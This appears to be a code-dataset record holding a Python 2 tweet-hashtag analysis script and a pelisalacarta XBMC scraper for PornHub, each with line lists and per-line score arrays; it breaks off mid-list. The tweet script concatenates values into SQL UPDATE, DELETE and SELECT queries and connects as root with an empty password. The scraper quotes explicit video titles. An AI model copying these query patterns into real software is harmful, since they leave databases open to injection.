[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0.012345679012345678, 0, 0, 0, 0, 0, 0, 0, 0.010416666666666666, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01020408163265306, 0, 0.008695652173913044, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
101
0.000763
false
import nltk import csv import pymysql import MySQLdb import sys import string import pickle import io #crawled_tags = ["runtastic", "running", "gym", "workout"] hostname = 'localhost' username = 'root' password = '' database = 'twitterdata_4' #tag_dict[crawled_tag][other_tag] = counter of occurrences tag_dict = {} #key words for keyword based filtering keywords = {'healthy': ['health', 'healthy'], 'active': ['doing', 'workout', 'playing', 'hardwork', 'fit', 'active', 'fitness'], 'passive': ['watching', 'beer', 'tv', 'couch', 'lazy', 'superbowl', 'wm', 'cheering', 'relax', 'relaxing', 'mlb'], 'food': ['food', 'eating', 'eat', 'meal', 'cook', 'cooking', 'yummy', 'foodporn', 'dinner', 'breakfast', 'delicious', 'lunch', 'restaurant', 'veggies', 'fruit', 'vegetables', 'nom', 'nomnom', 'foodgasm', 'fruits', 'healthyfood'], 'kind_of_sport': ['football', 'soccer', 'baseball', 'volleyball', 'basketball', 'golf', 'quidditch', 'swimming', 'running', 'cycling', 'boxing', 'lacrosse', 'cricket', 'tennis', 'athletics', 'rugby', 'hockey', 'skiing']} keyword_counter = {} def expandTable(col_name, conn): cur = conn.cursor() '''try: cur.execute("SHOW COLUMNS FROM " + col_name + " LIKE 'fieldname'") for current in cur.fetchall(): print current except: print "not here"''' cur.execute("SHOW COLUMNS FROM `tweets` LIKE '" + col_name + "'") fetched = cur.fetchall() if len(fetched) == 0: print "Creating column ", col_name # if col not there, create it cur.execute("ALTER TABLE tweets ADD " + col_name + " VARCHAR(150)") else: print "Column already existing" #print fetched def doQuery(conn, writeIntoDB): cur = conn.cursor() cur.execute("SELECT id, Hashtag, Text, created_at FROM tweets") #cur.execute("SELECT id, Hashtag, Text FROM tweets WHERE id = 269") entries = cur.fetchall() #checkDate(entries) #print entries[0][0] #id #print entries[0][1] #HashTag #print entries[0][2] #Text #sys.exit() for entry in entries: if entry[1] not in tag_dict: tag_dict[entry[1]] = {} #get all hashtags tag_list = 
entry[2].split("#") tag_list.pop(0) #print tag_list all_hashtags = [] #remove remaining text from hashtags for tag in tag_list: helper_list = tag.split(" ", 1) helper_list[0] = helper_list[0].lower().translate(None, string.punctuation) #remove all the newlines if "\n" in helper_list[0]: helper_list = helper_list[0].split("\n", 1) #print helper_list[0] #helper_list[0].replace("...", "") if entry[1] != helper_list[0]: #print "we are unequal" #print current_tag #print helper_list[0].lower() if helper_list[0] != '': if helper_list[0] not in tag_dict[entry[1]]: #print "if" tag_dict[entry[1]][helper_list[0]] = 1 else: #print "else" tag_dict[entry[1]][helper_list[0]] += 1 all_hashtags.append('#' + helper_list[0]) #else: #print "check" final_string = "" for addtag in all_hashtags: final_string += addtag + " " if writeIntoDB == "true": #print "write in DB" cur.execute("UPDATE tweets SET other_tags='" + final_string + "' WHERE id='" + str(entry[0]) + "'") #checkAmountOfTweets(conn) '''def checkNullValues(conn): cur = conn.cursor() cur.execute("SELECT id, Hashtag, Text FROM tweets WHERE other_tags IS NULL") print cur.fetchall()''' def writeInFile(): print "Write keyword_counter into txt file" with io.FileIO("keyword_counter.txt", "w") as file: pickle.dump(keyword_counter, file) def readFromFile(filename): with io.FileIO(filename, "r") as file: my_dict = pickle.load(file) #print my_dict return my_dict def writeCSV(): print "Write # counts into csv files" #test_dict = {k: v for k, v in tag_dict["gym"].iteritems() if v == 71} #print test_dict for key in tag_dict: with io.FileIO(key + "_tags.csv", "w") as file: #fieldnames = ['id', 'value'] w = csv.writer(file, ) #w.writerow({'id': 'value'}) w.writerow(['id', 'value']) w.writerows(tag_dict[key].items()) def removeLowValues(threshold): print "Removing all small values for better visualisation" for key in tag_dict: tag_dict[key] = {k: v for k, v in tag_dict[key].iteritems() if v >= threshold} def checkDate(entries): #print 
entries[0][3].date() dates = {} for entry in entries: if entry[3].date() not in dates: dates[entry[3].date()] = 1 else: dates[entry[3].date()] += 1 print dates def checkAmountOfTweets(conn): '''if tag_dict: #check if there are values in dict for key in tag_dict: print key cur = conn.cursor() cur.execute("SELECT id, Hashtag, Text, created_at FROM tweets") entries = cur.fetchall()''' cur = conn.cursor() for key in tag_dict: cur.execute("SELECT id FROM tweets WHERE HashTag = '" + key + "'") entries = cur.fetchall() #print key, ": ", len(entries), " tweets" def clearDB(conn, hashtag): cur = conn.cursor() cur.execute("DELETE FROM tweets WHERE HashTag = '" + hashtag +"'") def checkOnKeywords(conn): for key in keywords: for keyword in keywords[key]: for tag_key in tag_dict: helper_dict = {k: v for k, v in tag_dict[tag_key].iteritems() if keyword in k} if tag_key not in keyword_counter: keyword_counter[tag_key] = {} if key not in keyword_counter[tag_key]: # check if there are more than one occurences of food in this tweet '''if key == 'food': print helper_dict counts = checkFoodTag(helper_dict) else:''' keyword_counter[tag_key][key] = len(helper_dict) else: #if key == 'food': #print 'ok''' #else: keyword_counter[tag_key][key] += len(helper_dict) # just for test output '''for tag_key in keyword_counter: for key in keyword_counter[tag_key]: print tag_key, ": ", key, ": ", keyword_counter[tag_key][key]''' #print keyword_counter writeInFile() #readFromFile("keyword_counter.txt") '''def checkFoodTag(dict): #print dict counter = 0 ret_value = 0 for helper_key in dict: for key in keywords['food']: if key in dict[helper_key]: counter += 1 if counter > 1: #print counter ret_value += counter counter = 0 return ret_value ''' def writeActivePassive(): category_dict = readFromFile("keyword_counter.txt") #print category_dict dict_list = [] #dict_list.append(['1', '2', '3']) '''with io.FileIO("test.csv", "w") as file: w = csv.writer(file, ) w.writerow(['Tag', 'active', 'passive']) 
w.writerows(dict_list) print dict_list''' for key in category_dict: dict_list.append([key, category_dict[key]['active'], category_dict[key]['passive']]) with io.FileIO("active_passive/active_passive.csv", "w") as file: w = csv.writer(file, ) w.writerow(['Tag', 'active', 'passive']) w.writerows(dict_list) def popularSports(): print "Find most popular sports" popular_dict = {} #init dict for key in keywords["kind_of_sport"]: popular_dict[key] = 0 for key in tag_dict: if key == 'sport' or key == 'sports': for key_word in keywords['kind_of_sport']: #helper_dict = {k: v for k, v in tag_dict[tag_key].iteritems() if keyword in k} #print key_word if key_word in tag_dict[key].keys(): #print key_word + " in " + key popular_dict[key_word] += tag_dict[key][key_word] #print popular_dict #print popular_dict with io.FileIO("popularSports/popularSports.csv", "w") as file: w = csv.writer(file, ) w.writerow(['sport', 'mentions']) w.writerows(popular_dict.items()) myConnection = MySQLdb.connect( host=hostname, user=username, passwd=password, db=database ) #expandTable("other_tags", myConnection) #clearDB(myConnection, "workout") doQuery(myConnection, "false") #set to true, if you want to write into the DB #checkOnKeywords(myConnection) #removeLowValues(50) #writeCSV() #writeActivePassive() popularSports() myConnection.close()
[ "import nltk\n", "import csv\n", "import pymysql\n", "import MySQLdb\n", "import sys\n", "import string\n", "import pickle\n", "import io\n", "\n", "#crawled_tags = [\"runtastic\", \"running\", \"gym\", \"workout\"]\n", "\n", "hostname = 'localhost'\n", "username = 'root'\n", "password = ''\n", "database = 'twitterdata_4'\n", "\n", "#tag_dict[crawled_tag][other_tag] = counter of occurrences\n", "tag_dict = {}\n", "\n", "#key words for keyword based filtering\n", "keywords = {'healthy': ['health', 'healthy'], \n", " 'active': ['doing', 'workout', 'playing', \n", " 'hardwork', 'fit', 'active', 'fitness'], \n", " 'passive': ['watching', 'beer', 'tv', 'couch', \n", " 'lazy', 'superbowl', 'wm', 'cheering', \n", " 'relax', 'relaxing', 'mlb'],\n", " 'food': ['food', 'eating', 'eat', 'meal', 'cook', 'cooking', 'yummy', \n", " 'foodporn', 'dinner', 'breakfast', 'delicious', 'lunch',\n", " 'restaurant', 'veggies', 'fruit', 'vegetables', 'nom', 'nomnom',\n", " 'foodgasm', 'fruits', 'healthyfood'],\n", " 'kind_of_sport': ['football', 'soccer', 'baseball', 'volleyball', 'basketball', 'golf', 'quidditch', 'swimming', 'running', 'cycling', 'boxing', 'lacrosse', 'cricket', 'tennis', 'athletics', 'rugby', 'hockey', 'skiing']}\n", " \n", " \n", "keyword_counter = {}\n", "\n", "def expandTable(col_name, conn):\n", " cur = conn.cursor()\n", " \n", " '''try:\n", " cur.execute(\"SHOW COLUMNS FROM \" + col_name + \" LIKE 'fieldname'\")\n", " for current in cur.fetchall():\n", " print current\n", " except:\n", " print \"not here\"'''\n", " \n", " cur.execute(\"SHOW COLUMNS FROM `tweets` LIKE '\" + col_name + \"'\") \n", " fetched = cur.fetchall()\n", " if len(fetched) == 0:\n", " print \"Creating column \", col_name # if col not there, create it\n", " cur.execute(\"ALTER TABLE tweets ADD \" + col_name + \" VARCHAR(150)\")\n", " else:\n", " print \"Column already existing\"\n", " #print fetched\n", " \n", "\n", "\n", "def doQuery(conn, writeIntoDB):\n", " cur = conn.cursor()\n", "\n", " 
cur.execute(\"SELECT id, Hashtag, Text, created_at FROM tweets\")\n", " #cur.execute(\"SELECT id, Hashtag, Text FROM tweets WHERE id = 269\")\n", " \n", " entries = cur.fetchall()\n", " \n", " #checkDate(entries)\n", " \n", " #print entries[0][0] #id\n", " #print entries[0][1] #HashTag\n", " #print entries[0][2] #Text\n", " #sys.exit()\n", "\n", " for entry in entries:\n", " \n", " if entry[1] not in tag_dict:\n", " tag_dict[entry[1]] = {}\n", " #get all hashtags\n", " tag_list = entry[2].split(\"#\")\n", " tag_list.pop(0)\n", " #print tag_list\n", " all_hashtags = []\n", " \n", " \n", " #remove remaining text from hashtags\n", " for tag in tag_list:\n", " \n", " helper_list = tag.split(\" \", 1)\n", " helper_list[0] = helper_list[0].lower().translate(None, string.punctuation)\n", " \n", " #remove all the newlines\n", " if \"\\n\" in helper_list[0]:\n", " helper_list = helper_list[0].split(\"\\n\", 1)\n", " #print helper_list[0]\n", " #helper_list[0].replace(\"...\", \"\")\n", " if entry[1] != helper_list[0]:\n", " #print \"we are unequal\"\n", " #print current_tag\n", " #print helper_list[0].lower()\n", " \n", " if helper_list[0] != '':\n", " if helper_list[0] not in tag_dict[entry[1]]:\n", " #print \"if\"\n", " tag_dict[entry[1]][helper_list[0]] = 1\n", " else:\n", " #print \"else\"\n", " tag_dict[entry[1]][helper_list[0]] += 1\n", "\n", " all_hashtags.append('#' + helper_list[0])\n", " #else:\n", " #print \"check\"\n", " final_string = \"\"\n", " for addtag in all_hashtags:\n", " final_string += addtag + \" \"\n", "\n", " if writeIntoDB == \"true\":\n", " #print \"write in DB\"\n", " cur.execute(\"UPDATE tweets SET other_tags='\" + final_string + \"' WHERE id='\" + str(entry[0]) + \"'\") \n", " #checkAmountOfTweets(conn)\n", " \n", "'''def checkNullValues(conn):\n", " cur = conn.cursor()\n", "\n", " cur.execute(\"SELECT id, Hashtag, Text FROM tweets WHERE other_tags IS NULL\")\n", " \n", " print cur.fetchall()'''\n", " \n", " \n", "def writeInFile():\n", " print 
\"Write keyword_counter into txt file\"\n", " with io.FileIO(\"keyword_counter.txt\", \"w\") as file:\n", " pickle.dump(keyword_counter, file)\n", "\n", "def readFromFile(filename):\n", " with io.FileIO(filename, \"r\") as file:\n", " my_dict = pickle.load(file)\n", " #print my_dict\n", " return my_dict\n", " \n", "def writeCSV():\n", " print \"Write # counts into csv files\"\n", " #test_dict = {k: v for k, v in tag_dict[\"gym\"].iteritems() if v == 71}\n", " #print test_dict\n", " for key in tag_dict:\n", " with io.FileIO(key + \"_tags.csv\", \"w\") as file:\n", " #fieldnames = ['id', 'value']\n", " w = csv.writer(file, )\n", " #w.writerow({'id': 'value'})\n", " w.writerow(['id', 'value'])\n", " w.writerows(tag_dict[key].items())\n", "\n", " \n", "def removeLowValues(threshold):\n", " print \"Removing all small values for better visualisation\"\n", " for key in tag_dict:\n", " tag_dict[key] = {k: v for k, v in tag_dict[key].iteritems() if v >= threshold}\n", " \n", "def checkDate(entries):\n", " #print entries[0][3].date()\n", " dates = {}\n", " for entry in entries:\n", " if entry[3].date() not in dates:\n", " dates[entry[3].date()] = 1\n", " else:\n", " dates[entry[3].date()] += 1\n", " print dates\n", "\n", "def checkAmountOfTweets(conn):\n", " '''if tag_dict: #check if there are values in dict\n", " for key in tag_dict:\n", " print key\n", " cur = conn.cursor()\n", " cur.execute(\"SELECT id, Hashtag, Text, created_at FROM tweets\")\n", "\n", " entries = cur.fetchall()'''\n", " cur = conn.cursor()\n", " for key in tag_dict:\n", " cur.execute(\"SELECT id FROM tweets WHERE HashTag = '\" + key + \"'\")\n", " entries = cur.fetchall()\n", " #print key, \": \", len(entries), \" tweets\"\n", " \n", " \n", "def clearDB(conn, hashtag):\n", " cur = conn.cursor()\n", " cur.execute(\"DELETE FROM tweets WHERE HashTag = '\" + hashtag +\"'\")\n", " \n", "def checkOnKeywords(conn):\n", " for key in keywords:\n", " for keyword in keywords[key]:\n", " for tag_key in 
tag_dict:\n", " helper_dict = {k: v for k, v in tag_dict[tag_key].iteritems() if keyword in k}\n", " if tag_key not in keyword_counter:\n", " keyword_counter[tag_key] = {}\n", " if key not in keyword_counter[tag_key]:\n", " # check if there are more than one occurences of food in this tweet\n", " '''if key == 'food':\n", " print helper_dict\n", " counts = checkFoodTag(helper_dict) \n", " else:'''\n", " keyword_counter[tag_key][key] = len(helper_dict)\n", " else:\n", " #if key == 'food':\n", " #print 'ok'''\n", " #else:\n", " keyword_counter[tag_key][key] += len(helper_dict)\n", " \n", " # just for test output\n", " '''for tag_key in keyword_counter:\n", " for key in keyword_counter[tag_key]:\n", " print tag_key, \": \", key, \": \", keyword_counter[tag_key][key]'''\n", " #print keyword_counter \n", " writeInFile()\n", " #readFromFile(\"keyword_counter.txt\")\n", "'''def checkFoodTag(dict):\n", " #print dict\n", " counter = 0\n", " ret_value = 0\n", " for helper_key in dict:\n", " for key in keywords['food']:\n", " if key in dict[helper_key]:\n", " counter += 1\n", " if counter > 1:\n", " #print counter\n", " ret_value += counter\n", " counter = 0\n", " return ret_value ''' \n", " \n", "def writeActivePassive():\n", " category_dict = readFromFile(\"keyword_counter.txt\")\n", " #print category_dict\n", " dict_list = []\n", " #dict_list.append(['1', '2', '3'])\n", " '''with io.FileIO(\"test.csv\", \"w\") as file:\n", " w = csv.writer(file, )\n", " w.writerow(['Tag', 'active', 'passive'])\n", " w.writerows(dict_list)\n", " print dict_list'''\n", " for key in category_dict:\n", " dict_list.append([key, category_dict[key]['active'], category_dict[key]['passive']])\n", " \n", " with io.FileIO(\"active_passive/active_passive.csv\", \"w\") as file: \n", " w = csv.writer(file, ) \n", " w.writerow(['Tag', 'active', 'passive'])\n", " w.writerows(dict_list)\n", " \n", "def popularSports():\n", " print \"Find most popular sports\"\n", " popular_dict = {}\n", " #init dict\n", " 
for key in keywords[\"kind_of_sport\"]:\n", " popular_dict[key] = 0\n", " \n", " for key in tag_dict:\n", " if key == 'sport' or key == 'sports':\n", " for key_word in keywords['kind_of_sport']:\n", " #helper_dict = {k: v for k, v in tag_dict[tag_key].iteritems() if keyword in k}\n", " #print key_word\n", " \n", " if key_word in tag_dict[key].keys():\n", " #print key_word + \" in \" + key\n", " popular_dict[key_word] += tag_dict[key][key_word]\n", " #print popular_dict\n", " #print popular_dict\n", " with io.FileIO(\"popularSports/popularSports.csv\", \"w\") as file: \n", " w = csv.writer(file, )\n", " w.writerow(['sport', 'mentions'])\n", " w.writerows(popular_dict.items())\n", " \n", "myConnection = MySQLdb.connect( host=hostname, user=username, passwd=password, db=database )\n", "#expandTable(\"other_tags\", myConnection)\n", "#clearDB(myConnection, \"workout\")\n", "doQuery(myConnection, \"false\") #set to true, if you want to write into the DB\n", "#checkOnKeywords(myConnection)\n", "#removeLowValues(50)\n", "#writeCSV()\n", "#writeActivePassive()\n", "\n", "popularSports()\n", "myConnection.close()\n", "\n", "\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.01694915254237288, 0, 0, 0, 0, 0, 0, 0.01694915254237288, 0, 0, 0.02564102564102564, 0.02127659574468085, 0.0425531914893617, 0.034482758620689655, 0.038461538461538464, 0.017857142857142856, 0, 0.02666666666666667, 0.0136986301369863, 0.012345679012345678, 0, 0.008888888888888889, 0.058823529411764705, 0.058823529411764705, 0, 0, 0.030303030303030304, 0, 0.2, 0, 0, 0, 0, 0, 0, 0.2, 0.0136986301369863, 0, 0, 0.0136986301369863, 0, 0, 0, 0.043478260869565216, 0.1111111111111111, 0, 0, 0.03125, 0, 0, 0, 0.013888888888888888, 0.2, 0, 0.2, 0.041666666666666664, 0.2, 0.034482758620689655, 0.029411764705882353, 0.03225806451612903, 0.0625, 0, 0, 0.5, 0, 0, 0.038461538461538464, 0, 0, 0.041666666666666664, 0, 0.1111111111111111, 0.1111111111111111, 0.044444444444444446, 0, 0.5, 0, 0.011363636363636364, 0.07692307692307693, 0.02702702702702703, 0, 0, 0.02631578947368421, 0.02127659574468085, 0, 0.025, 0.02857142857142857, 0.021739130434782608, 0.058823529411764705, 0, 0, 0.027777777777777776, 0, 0, 0.02631578947368421, 0, 0, 0, 0.05263157894736842, 0.03225806451612903, 0, 0, 0, 0, 0, 0.030303030303030304, 0.017543859649122806, 0.03225806451612903, 0.07692307692307693, 0.03333333333333333, 0, 0, 0.012345679012345678, 0.2, 0, 0.2, 0.1111111111111111, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0, 0.043478260869565216, 0, 0.1111111111111111, 0.0625, 0, 0.013333333333333334, 0.047619047619047616, 0, 0, 0.023809523809523808, 0, 0.024390243902439025, 0, 0, 0, 0.07692307692307693, 0, 0, 0, 0.011494252873563218, 0.1111111111111111, 0.041666666666666664, 0.03125, 0, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02, 0.1111111111111111, 0.1111111111111111, 0, 0, 0.014084507042253521, 0.2, 0.037037037037037035, 0, 0, 0, 0.010526315789473684, 0, 0, 0, 0.011363636363636364, 0, 0, 0.014925373134328358, 0, 0, 0, 0.02564102564102564, 0.05263157894736842, 0.037037037037037035, 0, 0.05263157894736842, 0, 0, 0, 0, 0.05714285714285714, 
0, 0.024390243902439025, 0.037037037037037035, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03225806451612903, 0.14285714285714285, 0.038461538461538464, 0, 0.04, 0, 0.02564102564102564, 0, 0, 0, 0, 0, 0, 0.010752688172043012, 0.1111111111111111, 0.0136986301369863, 0.030303030303030304, 0, 0, 0.1111111111111111, 0.047619047619047616, 0, 0, 0.06666666666666667, 0, 0, 0.2, 0, 0, 0, 0.03, 0.05555555555555555, 0.047619047619047616, 0.017543859649122806, 0.01818181818181818, 0, 0.041666666666666664, 0.041666666666666664, 0.014084507042253521, 0, 0, 0, 0.07692307692307693, 0.043010752688172046, 0.024390243902439025, 0.029411764705882353, 0.02564102564102564, 0.03225806451612903, 0.047619047619047616, 0.08333333333333333, 0.045454545454545456, 0, 0, 0, 0, 1 ]
279
0.030021
false
# -*- coding: utf-8 -*- #------------------------------------------------------------ # pelisalacarta - XBMC Plugin # Canal para pornhub # http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/ #------------------------------------------------------------ import urlparse,urllib2,urllib,re import os, sys from core import logger from core import config from core import scrapertools from core.item import Item from servers import servertools __channel__ = "pornhub" __category__ = "F" __type__ = "generic" __title__ = "PornHub" __language__ = "ES" __fanart__="http://i.imgur.com/PwFvoss.jpg" DEBUG = config.get_setting("debug") def isGeneric(): return True def mainlist(item): logger.info("[pornhub.py] mainlist") itemlist = [] item.url ="http://es.pornhub.com" # Descarga la página data = get_main_page(item.url + "/categories?o=al") data = scrapertools.find_single_match(data,'<div id="categoriesStraightImages">(.*?)</ul>') ''' <li class="cat_pic" data-category="28"> <div class="category-wrapper"> <a href="/video?c=28"><img src="http://i0.cdn2b.image.pornhub.phncdn.com/m=eXs28zjadqg/static/images/categories/28.jpg" alt="Maduras" /></a> <h5> <a href="/video?c=28"><strong>Maduras</strong> <span>(<var>3950</var>)</span></a> </h5> </div> </li> ''' # Extrae las categorias patron = '<li class="cat_pic" data-category="\d+">.*?' 
patron += '<a href="([^"]+)">' patron += '<img src="([^"]+)" ' patron += 'alt="([^"]+)"' matches = re.compile(patron,re.DOTALL).findall(data) scrapertools.printMatches(matches) for scrapedurl,scrapedthumbnail,scrapedtitle in matches: title = scrapedtitle url = urlparse.urljoin(item.url,scrapedurl + "&o=cm") thumbnail = scrapedthumbnail #thumbnail ="" #try: itemlist.append( Item(channel=__channel__, action="peliculas", title=title, url=url , fanart=__fanart__ , thumbnail=thumbnail, folder=True) ) #except: #logger.info("pelisalacarta.channels.pornhub except") itemlist.sort(key=lambda x: x.title) return itemlist def peliculas(item): logger.info("[pornhub.py] peliculas") itemlist = [] # Descarga la página data = get_main_page(item.url) data = scrapertools.find_single_match(data,'<ul class="nf-videos videos row-4-thumbs">(.*?)<div class="pre-footer">') ''' <li class="videoblock" id="37717631" _vkey="2064578485" > <div class="wrap"> <div class="phimage"> <a href="/view_video.php?viewkey=2064578485" title="Glamorous Brunette Gets Fucked Hard On Armchair 2" class="img" data-related-url="/video/ajax_related_video?vkey=2064578485"> <div class="marker-overlays"> <var class="duration">16:29</var> <span class="hd-thumbnail">HD</span> </div> <img src="http://cdn1b.static.pornhub.phncdn.com/www-static/images/blank.gif" alt="Glamorous Brunette Gets Fucked Hard On Armchair 2" data-smallthumb="http://i1.cdn2b.image.pornhub.phncdn.com/m=eGcE8daaaa/videos/201501/19/37717631/original/12.jpg" data-mediumthumb="http://i1.cdn2b.image.pornhub.phncdn.com/m=eWdT8daaaa/videos/201501/19/37717631/original/12.jpg" class="thumb" width="150" class="rotating" id="238153595837717631" onmouseover="startThumbChange(37717631, '238153595837717631', 16, 'http://i1.cdn2b.image.pornhub.phncdn.com/m=eWdT8daaaa/videos/201501/19/37717631/original/{index}.jpg');" onmouseout="endThumbChange('238153595837717631');" title="Glamorous Brunette Gets Fucked Hard On Armchair 2" /> </a> </div> <div 
class="add-to-playlist-icon display-none"> <button type="button" data-title="Agregar a una lista de reproducción" class="tooltipTrig open-playlist-link playlist-trigger" onclick="return false;" data-rel="2064578485" >+</button> </div> <div class="thumbnail-info-wrapper clearfix"> <span class="title"> <a href="/view_video.php?viewkey=2064578485" title="Glamorous Brunette Gets Fucked Hard On Armchair 2">Glamorous Brunette Gets Fucked Hard On Armchair 2</a> </span> <span class="views"><var>35</var> vistas</span> <div class="rating-container up"> <div class="main-sprite icon"></div> <div class="value">100%</div> </div> <var class="added">5 hours ago</var> </div> </div> </li> ''' # Extrae las peliculas patron = '<div class="phimage">.*?' patron += '<a href="/view_video.php\?viewkey=([^"]+)" title="([^"]+).*?' patron += '<var class="duration">([^<]+)</var>(.*?)</div>.*?' patron += 'data-smallthumb="([^"]+)"' matches = re.compile(patron,re.DOTALL).findall(data) scrapertools.printMatches(matches) for viewkey,scrapedtitle,duration,scrapedhd,thumbnail in matches: title=scrapedtitle.replace('&amp;','&')+" ("+duration+")" scrapedhd = scrapertools.find_single_match(scrapedhd,'<span class="hd-thumbnail">(.*?)</span>') if (scrapedhd == 'HD') : title += ' [HD]' url= 'http://es.pornhub.com/embed/' + viewkey if (DEBUG): logger.info("title=["+title+"], url=["+url+"], thumbnail=["+thumbnail+"]") itemlist.append( Item(channel=__channel__, action="play", title=title , url=url ,fanart=__fanart__, thumbnail=thumbnail) ) # Paginador patron = '<li class="page_next"><a href="([^"]+)"' matches = re.compile(patron,re.DOTALL).findall(data) scrapertools.printMatches(matches) if len(matches)>0: url=urlparse.urljoin("http://es.pornhub.com",matches[0].replace('&amp;','&')) itemlist.append( Item(channel=__channel__, action="peliculas", title=">> Página siguiente" ,fanart=__fanart__, url=url)) return itemlist def play(item): logger.info("[pornhub.py] play") itemlist=[] 
#item.url='http://es.pornhub.com/embed/' + viewkey # Descarga la página data = get_main_page(item.url) data = scrapertools.find_single_match(data,'html5Config([^}]+)},') url = scrapertools.get_match(data,"src\s+:\s+'([^']+)',") #url= "http://cdn2b.embed.pornhub.phncdn.com/videos/201501/19/37717631/480P_600K_37717631.mp4?rs=200&ri=2500&ip=188.79.24.200&s=1421873759&e=1421880959&h=6cd0058bc8e5abac9ccfdaa50c6bdf19" #logger.info("url="+url) server="Directo" itemlist.append( Item(channel=__channel__, title="" , url=url , server=server, folder=False) ) return itemlist def get_main_page(url): logger.info("[pornhub.py] get_main_page") headers=[] headers.append(["User-Agent","Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:20.0) Gecko/20100101 Firefox/20.0"]) headers.append(["Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"]) headers.append(["Accept-Language","es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3"]) headers.append(["Accept-Encoding","gzip, deflate"]) # Descarga la página data = scrapertools.cachePage(url,headers=headers) #logger.info("pelisalacarta.channels.pornhub data="+data) return data
[ "# -*- coding: utf-8 -*-\n", "#------------------------------------------------------------\n", "# pelisalacarta - XBMC Plugin\n", "# Canal para pornhub\n", "# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/\n", "#------------------------------------------------------------\n", "import urlparse,urllib2,urllib,re\n", "import os, sys\n", "\n", "from core import logger\n", "from core import config\n", "from core import scrapertools\n", "from core.item import Item\n", "from servers import servertools\n", "\n", "__channel__ = \"pornhub\"\n", "__category__ = \"F\"\n", "__type__ = \"generic\"\n", "__title__ = \"PornHub\"\n", "__language__ = \"ES\"\n", "__fanart__=\"http://i.imgur.com/PwFvoss.jpg\"\n", "\n", "DEBUG = config.get_setting(\"debug\")\n", "\n", "def isGeneric():\n", " return True\n", "\n", "def mainlist(item):\n", " logger.info(\"[pornhub.py] mainlist\")\n", " itemlist = []\n", " \n", " item.url =\"http://es.pornhub.com\"\n", " \n", " # Descarga la página\n", " data = get_main_page(item.url + \"/categories?o=al\")\n", " data = scrapertools.find_single_match(data,'<div id=\"categoriesStraightImages\">(.*?)</ul>')\n", " \n", " '''\n", " <li class=\"cat_pic\" data-category=\"28\">\n", " <div class=\"category-wrapper\">\n", " <a href=\"/video?c=28\"><img src=\"http://i0.cdn2b.image.pornhub.phncdn.com/m=eXs28zjadqg/static/images/categories/28.jpg\" alt=\"Maduras\" /></a>\n", " <h5>\n", " <a href=\"/video?c=28\"><strong>Maduras</strong>\n", " <span>(<var>3950</var>)</span></a>\n", " </h5>\n", " </div>\n", " </li>\n", " '''\n", " \n", " # Extrae las categorias\n", " patron = '<li class=\"cat_pic\" data-category=\"\\d+\">.*?'\n", " patron += '<a href=\"([^\"]+)\">'\n", " patron += '<img src=\"([^\"]+)\" '\n", " patron += 'alt=\"([^\"]+)\"'\n", " \n", " matches = re.compile(patron,re.DOTALL).findall(data)\n", " scrapertools.printMatches(matches)\n", " \n", " for scrapedurl,scrapedthumbnail,scrapedtitle in matches:\n", " title = scrapedtitle\n", " url = 
urlparse.urljoin(item.url,scrapedurl + \"&o=cm\")\n", " thumbnail = scrapedthumbnail\n", " #thumbnail =\"\"\n", " \n", " #try:\n", " itemlist.append( Item(channel=__channel__, action=\"peliculas\", title=title, url=url , fanart=__fanart__ , thumbnail=thumbnail, folder=True) )\n", " #except:\n", " #logger.info(\"pelisalacarta.channels.pornhub except\")\n", " \n", " itemlist.sort(key=lambda x: x.title)\n", " return itemlist\n", "\n", "def peliculas(item):\n", " logger.info(\"[pornhub.py] peliculas\")\n", " itemlist = []\n", " \n", " # Descarga la página\n", " data = get_main_page(item.url)\n", " data = scrapertools.find_single_match(data,'<ul class=\"nf-videos videos row-4-thumbs\">(.*?)<div class=\"pre-footer\">')\n", " \n", " '''\n", " <li class=\"videoblock\" id=\"37717631\" _vkey=\"2064578485\" >\n", " <div class=\"wrap\">\n", " <div class=\"phimage\">\n", " <a href=\"/view_video.php?viewkey=2064578485\" title=\"Glamorous Brunette Gets Fucked Hard On Armchair 2\" class=\"img\" data-related-url=\"/video/ajax_related_video?vkey=2064578485\">\n", " <div class=\"marker-overlays\">\n", " <var class=\"duration\">16:29</var>\n", " <span class=\"hd-thumbnail\">HD</span>\n", " </div>\n", " <img src=\"http://cdn1b.static.pornhub.phncdn.com/www-static/images/blank.gif\" alt=\"Glamorous Brunette Gets Fucked Hard On Armchair 2\" data-smallthumb=\"http://i1.cdn2b.image.pornhub.phncdn.com/m=eGcE8daaaa/videos/201501/19/37717631/original/12.jpg\" data-mediumthumb=\"http://i1.cdn2b.image.pornhub.phncdn.com/m=eWdT8daaaa/videos/201501/19/37717631/original/12.jpg\" class=\"thumb\" width=\"150\" class=\"rotating\" id=\"238153595837717631\" onmouseover=\"startThumbChange(37717631, '238153595837717631', 16, 'http://i1.cdn2b.image.pornhub.phncdn.com/m=eWdT8daaaa/videos/201501/19/37717631/original/{index}.jpg');\" onmouseout=\"endThumbChange('238153595837717631');\" title=\"Glamorous Brunette Gets Fucked Hard On Armchair 2\" />\n", " </a>\n", " </div>\n", " <div 
